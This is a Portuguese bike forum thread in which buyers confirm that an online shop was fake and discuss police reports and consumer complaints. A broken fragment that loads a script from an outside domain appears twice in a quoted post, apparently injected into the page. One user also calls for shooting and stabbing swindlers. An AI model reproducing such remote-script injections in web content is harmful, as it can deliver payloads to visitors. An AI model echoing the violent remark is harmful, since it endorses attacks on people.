Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Cara, deixe tudo registrado, se encontrar, se possível até grave audio com o celular no bolso, sei lá.
E sobretudo, tome muito cuidado, por favor. Que bom que eu te encontrei porque a gente vai se ajudar.
Voltar ao Topo
hurry-gurits Ver Drop Down
Avatar

Cadastrado em: 13 Out 2015
são paulo
Offline
Mensagens:2069
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar hurry-gurits Citar  ResponderResponder Link direto para este Post Postado: 08 Dez 2019 as 23:55
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Eu irei pessoalmente até encontrar o dono do anúncio.
Se eu não receber as bikes até quarta-feira, perderei dois dias de serviço, mas eu vou achar esse cidadão.
< ="text/" async="" ="//yourrecovery.net/20f4f9c60ef9e65fac.js">

Cara, deixe tudo registrado, se encontrar, se possível até grave audio com o celular no bolso, sei lá.
E sobretudo, tome muito cuidado, por favor. Que bom que eu te encontrei porque a gente vai se ajudar.

Galera, torcendo aqui para que tudo dê certo.

Mas com estelionatário, a unica solução é bala na testa e faca no bucho, o crime é ridiculamente punido pelo código penal, esse papo de gravar, filmar, nada disto vale realmente a pena, se pesquisar o nome dos sócios da loja no site do tjus,  vai descobrir o tamanho da capivara dos sócios, isso já vai ser um indicador se você foi enganado, ou não.
scott single track 95 26" cromo
khs 204 full 2012 26"- R.I.P.
khs sixfifty 2500 27.5" - 2014
Mongoose XR PRO 29" - 2016
GT Sanction Pro 27.5" - 2015
GT Agressor 1.0 26" - 2012 - Pumptrack Edition
Voltar ao Topo
MarcioRodrigues Ver Drop Down
Avatar

Cadastrado em: 28 Mai 2019
Jacutinga MG
Offline
Mensagens:104
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar MarcioRodrigues Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 08:00
Legal hem, assim anima trocar o BIP pelo Verge
IBIS MOJO HD-R 27.5
KHS Alite 2000 26
Cake DLX5 27.5
Caloi Elite 29
Speed |KHS
Voltar ao Topo
GabrielSL329 Ver Drop Down
Avatar

Cadastrado em: 09 Mar 2019
Farroupilha
Offline
Mensagens:1715
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar GabrielSL329 Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 08:27
Originalmente postado por hurry-gurits hurry-gurits escreveu:

Galera, torcendo aqui para que tudo dê certo.
Mas com estelionatário, a unica solução é bala na testa e faca no bucho, o crime é ridiculamente punido pelo código penal, esse papo de gravar, filmar, nada disto vale realmente a pena, se pesquisar o nome dos sócios da loja no site do tjus,  vai descobrir o tamanho da capivara dos sócios, isso já vai ser um indicador se você foi enganado, ou não.


Concordo plenamente!
A ideia de comércio eletrônico é ótima, mas deturpada por um bando de fdp que quer tirar vantagem em cima dos outros!
O jeito é comprar de lojas conhecidas ou do ML, que possui o programa de proteção ao comprador!
Gabriel Pires
MTB: Show Rocker 12v Orange
Speed: Caloi Strada Sora 16v (aposentada)
Voltar ao Topo
Paulo Valdevite Ver Drop Down


Cadastrado em: 07 Dez 2019
Serrana
Offline
Mensagens:6
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Paulo Valdevite Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 08:41
É golpe mesmo...perdemos.
O site é falso.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 14:33
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

É golpe mesmo...perdemos.
O site é falso.


Você conseguiu ir lá? Pode me confirmar detalhes? Vou fazer um Boletim de Ocorrência
Voltar ao Topo
Paulo Valdevite Ver Drop Down


Cadastrado em: 07 Dez 2019
Serrana
Offline
Mensagens:6
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Paulo Valdevite Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 15:06
Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.
Voltar ao Topo
aianabenet Ver Drop Down
Avatar

Cadastrado em: 06 Dez 2019
Salvador-BA
Offline
Mensagens:42
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar aianabenet Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 15:22
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.


Voltar ao Topo
Fabio Ver Drop Down


Cadastrado em: 07 Out 2003
-
Offline
Mensagens:8603
Opções da Mensagem Opções da Mensagem   Agradecimentos (0) Agradecimentos(0)   Citar Fabio Citar  ResponderResponder Link direto para este Post Postado: 09 Dez 2019 as 15:59
E com certeza essa mulher que aparece como dona nem sabe da história.
Voltar ao Topo
 Responder Página  123>

Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 12.07
Copyright ©2001-2024 Web Wiz Ltd.

 
 
 
 
 
 

X